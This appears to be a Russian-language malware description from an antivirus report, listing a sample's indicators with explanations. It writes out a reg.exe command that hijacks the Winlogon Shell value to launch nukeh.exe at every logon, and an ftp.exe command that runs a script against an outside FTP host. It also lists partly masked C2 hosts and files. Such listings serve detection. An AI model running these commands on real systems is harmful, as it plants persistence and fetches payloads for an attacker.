Техническая информация
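- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe <SYSTEM32>\nukeh.exe' (закрепление в системе: стандартное значение параметра Shell — 'explorer.exe'; здесь к нему дописан путь к nukeh.exe, который передаётся explorer.exe при каждом входе пользователя в систему. Любое значение Shell, отличное от 'explorer.exe', следует проверять.)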
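- <SYSTEM32>\ftp.exe -s:%WINDIR%\transfer.txt ftp.webcindario.com (ключ -s: задаёт файл со сценарием FTP-команд; здесь это %WINDIR%\transfer.txt, который указан ниже в этом же списке)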
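- <SYSTEM32>\reg.exe add hklm\software\microsoft\windows" "NT\currentversion\winlogon /v Shell /t REG_SZ /d explorer.exe" "<SYSTEM32>\nukeh.exe /f (последовательности `" "`, по-видимому, обозначают пробелы внутри аргументов в записи командной строки; команда записывает в параметр Shell то же значение, что указано выше, а ключ /f перезаписывает существующее значение без запроса подтверждения)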
- %WINDIR%\explorer.exe <Текущая директория><Имя вируса>
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\nuke[1].htm
- %WINDIR%\transfer.txt
- <SYSTEM32>\nukeh.exe
- 'ft#.##bcindario.com':21
- 'localhost':1040
- 'localhost':1035
- 'mx.###cities.com':80
- mx.###cities.com/vampiro_caifanes/nuke.htm
- DNS ASK ft#.##bcindario.com
- DNS ASK mx.###cities.com
- '10.#.1.1':1037
- '10.#.1.1':1036
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''